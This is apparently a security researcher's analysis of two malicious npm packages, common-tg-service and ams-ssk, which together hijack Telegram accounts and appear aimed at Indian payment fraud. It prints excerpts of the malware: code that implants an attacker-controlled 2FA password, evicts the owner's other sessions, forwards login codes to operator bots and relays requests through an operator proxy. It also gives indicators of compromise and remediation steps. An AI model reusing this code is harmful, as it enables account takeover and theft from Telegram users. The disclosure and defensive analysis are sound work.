common-tg-service: 502 npm Versions Hijack Telegram

TL;DR

common-tg-service is an npm package that presents itself as a “Common Telegram service for NestJS applications.” The compiled code inside dist/ is a Telegram account-takeover framework. All 502 published versions (1.0.1 through 1.3.207) are malicious. The package pulls 28,000 weekly downloads on the public npm registry.

A second package by the same publisher, [email protected], is the server-side runtime that common-tg-service calls back to. ams-ssk does not attack the host that installs it. It ships the operator’s infrastructure code: same shetty123 npm publisher, identical folders/:folder/files/download-all API surface, the same copy-pasted NestJS template README, the same disguise pattern. Matched client and server.

Impact:

• Sets a hardcoded 2FA password (Ajtdmwajt1@) on every Telegram account passed through the service, with the operator’s Gmail ([email protected]) as recovery address.
• Reads the operator’s IMAP mailbox to auto-submit Telegram’s 2FA confirmation email. The victim sees nothing.
• Revokes every device authorization that does not match the operator’s session, kicking the legitimate owner off their own account.
• Forwards every OTP login code from Telegram chat 777000 to operator-controlled bot channels alongside the victim’s phone number.
• Runs an SRP-check loop against every managed account and flags any account where the user rotated their 2FA as FOREIGN 2FA password, account unrecoverable.
• Pulls runtime configuration from npoint.io using committed plaintext credentials and a pre-baked session cookie. The operator can change behavior of all deployed instances without re-publishing.
• Routes blocked HTTP requests through helper-thge.onrender.com as an attribution-laundering relay.

Indicators of Compromise (campaign-level):

Three details name the target: the “UPI Integration” feature in the README, the report-upi.netlify.app origin, and the India143 2FA hint. The framework is aimed at Indian Telegram accounts for downstream payments fraud.

Package 1: common-tg-service

Provenance

The version count was verified directly:

1
$ npm view common-tg-service versions --json | jq 'length'
2
502

The package declares no preinstall or postinstall hooks. Install-time scanners that gate on lifecycle scripts will not flag it. The malice runs when the service starts, not when npm install does.

Behavior 1: 2FA implant via IMAP

When the service handles a Telegram account without a 2FA password, it sets one. The password, recovery email, and hint are all hardcoded.

1
// dist/components/Telegram/manager/auth-operations.js:110
2
async function set2fa(ctx) {
3
  if (!(await hasPassword(ctx))) {
4
    const twoFaDetails = {
5
      email: '[email protected]',
6
      hint: 'password - India143',
7
      newPassword: 'Ajtdmwajt1@',
8
    };
9
    return imapService.runExclusive(async () => {
10
      await imapService.connectToMail(30_000);
11
      await ctx.client.updateTwoFaSettings({
12
        isCheckPassword: false,
13
        email: twoFaDetails.email,
14
        hint: twoFaDetails.hint,
15
        newPassword: twoFaDetails.newPassword,
16
        emailCodeCallback: async (length) => {
17
          /* polls operator's mailbox up to 4 times,
18
                       reads the email confirmation code Telegram sent,
19
                       and submits it back to Telegram automatically */
20
        },
21
      });
22
    });
23
  }
24
}

The IMAP module connects to the operator’s imap.gmail.com mailbox, reads the confirmation code Telegram sends to the recovery address, and submits it back to Telegram. The whole 2FA setup runs without prompting the victim.

The recovery email being operator-controlled is the load-bearing detail. Even if a victim regains some other access to their account, the operator can reset 2FA at any time through the recovery flow.

Behavior 2: ownership-verification loop

The framework does not just take the account over. It watches for users who escape.

1
// dist/components/shared/base-client.service.js:208
2
this.KNOWN_2FA_PASSWORD = 'Ajtdmwajt1@';
3
// ...
4
const srp = await computeCheck(passwordInfo, this.KNOWN_2FA_PASSWORD);
5
if (/* SRP check failed */) {
6
    this.logger.warn(`${mobile}: 2FA password verification failed, foreign password`);
7
    await this.markAsInactive(doc.mobile,
8
        'Foreign 2FA password, account unrecoverable if session dies');
9
    this.botsService.sendMessageByCategory(
10
        ChannelCategory.ACCOUNT_NOTIFICATIONS,
11
        `<b>FOREIGN 2FA</b>\n<b>Mobile:</b> ${doc.mobile}\n<b>Status:</b> Account has unknown 2FA password, marked inactive`,
12
        { parseMode: 'HTML' }
13
    );
14
}

On a loop, the framework SRP-checks every managed account against the hardcoded password. If the legitimate user has rotated their 2FA, the framework marks the account unrecoverable and pings the operator’s Telegram channel. The campaign alerts on user pushback.

Behavior 3: forcible eviction of other sessions

For every other device authorized on the account, the framework calls account.GetAuthorizations, filters out the operator’s own session fingerprint, and revokes the rest.

1
// dist/components/Telegram/manager/auth-operations.js:32
2
async function removeOtherAuths(ctx) {
3
  const result = await ctx.client.invoke(new Api.account.GetAuthorizations());
4
  for (const auth of result.authorizations) {
5
    if (isOwnAuth(ctx.phoneNumber, auth)) continue;
6
    await fetchWithTimeout(
7
      `${notifbot()}&text=${encodeURIComponent(
8
        `Removing Auth\n\nMobile: ${ctx.phoneNumber}\nApp: ${auth.appName}\n` +
9
          `Device: ${auth.deviceModel}\nCountry: ${auth.country}\nAPI ID: ${auth.apiId}`
10
      )}`
11
    );
12
    await resetAuthorization(ctx, auth);
13
  }
14
}

Each revocation reports back to the operator’s bot channel with phone, country, device model, and API ID. The legitimate owner gets booted off their own account, no notification, no recourse.

Behavior 4: OTP harvesting from chat 777000

Telegram delivers OTP login codes from the official sender chat 777000. The framework listens for messages on that chat and forwards them straight to the operator’s bot channel.

1
// dist/components/Telegram/manager/client-operations.js:107
2
if (event.message.chatId.toString() == '777000') {
3
  await fetchWithTimeout(
4
    `${notifbot()}&text=${encodeURIComponent(
5
      `Login Code Received\n\nClient: ${process.env.clientId}\n` +
6
        `Mobile: ${ctx.phoneNumber}\nMessage: ${event.message.text?.substring(0, 100)}`
7
    )}`
8
  );
9
}

Any phone number passing through the framework gives the operator full login capability on demand.

Behavior 5: npoint.io as remote config store

npoint.io is a free public JSON hosting service. The operator committed live credentials and a pre-baked session cookie for their npoint account into the source.

1
// dist/components/n-point/npoint.service.js:17
2
this.cookie = '_npoint_session=MTBOeElFZ0pX...== --4d0883b9956c6...';
3
this.baseUrl = 'https://www.npoint.io';
4
this.signInUrl = 'https://www.npoint.io/users/sign_in';
5
// ...
6
const data = JSON.stringify({
7
  user: {
8
    email: '[email protected]',
9
    password: 'Ajtdmwajt1@',
10
  },
11
});

Every running instance authenticates to npoint as the operator and pulls JSON configuration from there. The operator can change behavior of all deployed instances by editing a JSON file on npoint, no re-publish required.

Behavior 6: HTTP request laundering

On HTTP 403 or 495, the framework re-issues the request through an operator-controlled relay.

1
// dist/utils/fetchWithTimeout.js:79
2
async function makeBypassRequest(url, options) {
3
  const finalBypassUrl = bypassUrl.startsWith('http') ? bypassUrl : 'https://helper-thge.onrender.com/execute-request';
4
  const response = await bypassAxios.post(
5
    finalBypassUrl,
6
    {
7
      url,
8
      method,
9
      headers,
10
      data,
11
      params /* ... */,
12
    },
13
    { headers: { 'x-api-key': process.env.X_API_KEY || 'santoor' } }
14
  );
15
}
16

17
if (parsedError.status === 403 || parsedError.status === 495) {
18
  const bypassResponse = await makeBypassRequest(url, options);
19
}

helper-thge.onrender.com runs on Render’s free tier and serves as an attribution-laundering proxy. The authentication header is the shared string santoor, which the codebase reuses as a universal internal API key.

Behavior 7: authentication bypass backdoor

The service exposes administrative endpoints behind an AuthGuard. Any one of three conditions passes the guard:

1
// dist/guards/auth.guard.js:14
2
const ALLOWED_IPS = ['31.97.59.2', '148.230.84.50', '13.228.225.19', '18.142.128.26', '54.254.162.138'];
3
const ALLOWED_ORIGINS = [
4
  'https://paidgirl.site',
5
  'https://zomcall.netlify.app',
6
  /* ... */
7
];
8
// ...
9
if (apiKey && apiKey.toLowerCase() === 'santoor') {
10
  passedReason = 'API key valid';
11
}

The API key is a publicly readable string in the source. Anyone who reads the package can authenticate as the operator.

Cross-reference map for common-tg-service

Manifest and README deception

The README is a copy-pasted NestJS template, presenting the package as “A progressive Node.js framework” with a generic feature list (Telegram Bot Integration, Channel Management, Statistics, Promotion Management, UPI Integration). It mentions none of the real behaviors: no 2FA modification, no IMAP polling, no hardcoded credentials, no Telegram bot exfil, no forced revocation of other authorizations.

package.json declares no install-time scripts, so install-time scanners stay quiet. All malice runs at runtime.

Package 2: ams-ssk

The same shetty123 npm publisher also maintains ams-ssk, marketed as “NestJS AMS Library for file management.” On its own, ams-ssk is not a stealer or RAT. The package has no payload aimed at the host that runs npm install ams-ssk. What makes it interesting is the role it plays: the server-side runtime that common-tg-service calls into.

Provenance

The display author Mad_man is the same handle that appears in the operator’s repository.url field.

What ams-ssk ships

The package bundles two functional modules:

• FileModule, a folder-and-file CRUD API: listFolders, createFolder, deleteFolder, uploadFiles, downloadFile, moveFile, copyFile, plus generateShareableLink, getTemporaryLinks, uploadFromUrl, JSON path/query helpers, file preview, thumbnail, range-streaming, lock/unlock, versioning, and a bulk-zip endpoint folders/:folder/files/download-all (registered at dist/files/file.controller.js:428).
• BotModule, a Telegram multi-bot forwarder. botLoadBalancer manages a pool of node-telegram-bot-api clients with per-bot operation counters; botService forwards incoming messages to configured channels with retry and admin-chat notification.

In isolation the code is clean of obvious red flags: no hardcoded operator credentials, no paidgirl.site strings, no eval or child_process, no base64 obfuscation, no postinstall hooks, no IMAP modules.

How it links to common-tg-service

The link is the API surface. common-tg-service calls a specific URL grammar; ams-ssk defines that same grammar.

cms.paidgirl.site is a deployed instance of ams-ssk (or a sibling fork that shares the same controllers). The folder/file URL grammar is identical between client and server.

The Swagger DTO for shareable links leaks a second operator-controlled host that does not appear anywhere in common-tg-service:

1
// dist/files/dto/responses.dto.js:80
2
example: 'https://promoteClients2.glitch.me/folders/docs/files/example.pdf?share=true',

promoteClients2.glitch.me is a previously unreported operator host on the free Glitch.me platform. The “2” suffix points to sequential staging (promoteClients, promoteClients2, possibly more). The naming lines up with common-tg-service’s PromoteClientModule, which warms up newly-acquired Telegram accounts.

The two share architecture, not just an API:

The disguise pattern is identical: copy-pasted NestJS template README (same circleci-image, same paypal.me/kamilmysliwiec, same Kamil Myśliwiec author block), misleading “file management library” description, undeclared Telegram bot integration in the keywords, and a non-resolvable GitHub repository URL.

One other tell: dist/files/utils/helper.js:42 hardcodes VIDEO_ROOT = path.resolve(process.cwd(), 'videos') and constrains getSafeFilePath to that directory. Combined with the paidgirl.site brand and the .mp4 default file extension, the AMS deployment likely hosts media used as honeypot bait for Telegram targets.

Indicators of Compromise (ams-ssk-specific)

Verdict on ams-ssk

ams-ssk is operator infrastructure tooling, public on npm. Its secondary effect is plausible deniability: “this developer also publishes a normal NestJS library” softens scrutiny on the malicious sibling.

Remediation

If a project depends on common-tg-service at any version:

1. Remove the dependency.
2. Audit every Telegram account whose phone number passed through the service. Check the 2FA recovery email ([email protected] means compromise), check the 2FA hint (password - India143 means compromise), and review active authorizations under Settings → Devices for unknown sessions originating from the operator IPs above.
3. Reset Telegram 2FA password and recovery email, then revoke all other active sessions.
4. Block egress to paidgirl.site, cms.paidgirl.site, helper-thge.onrender.com, promoteClients2.glitch.me, and www.npoint.io from any environment that ran the package.
5. Rotate any environment variables that may have been exposed to the running service: BOT_TOKENS, clientId, accountsChannel, updatesChannel, notifChannel, httpFailuresChannel, X_API_KEY, PROXY_API_URL, PROXY_API_KEY, bypassURL.

Verdict

common-tg-service is a Telegram account-takeover framework, shipped as 502 npm versions under a benign NestJS-utility name. ams-ssk is the same operator’s server-side runtime, deployed at cms.paidgirl.site and promoteClients2.glitch.me and published on npm under the same shetty123 identity with the same disguise pattern. The two are a matched client and server in one credential-harvesting and account-hijacking operation.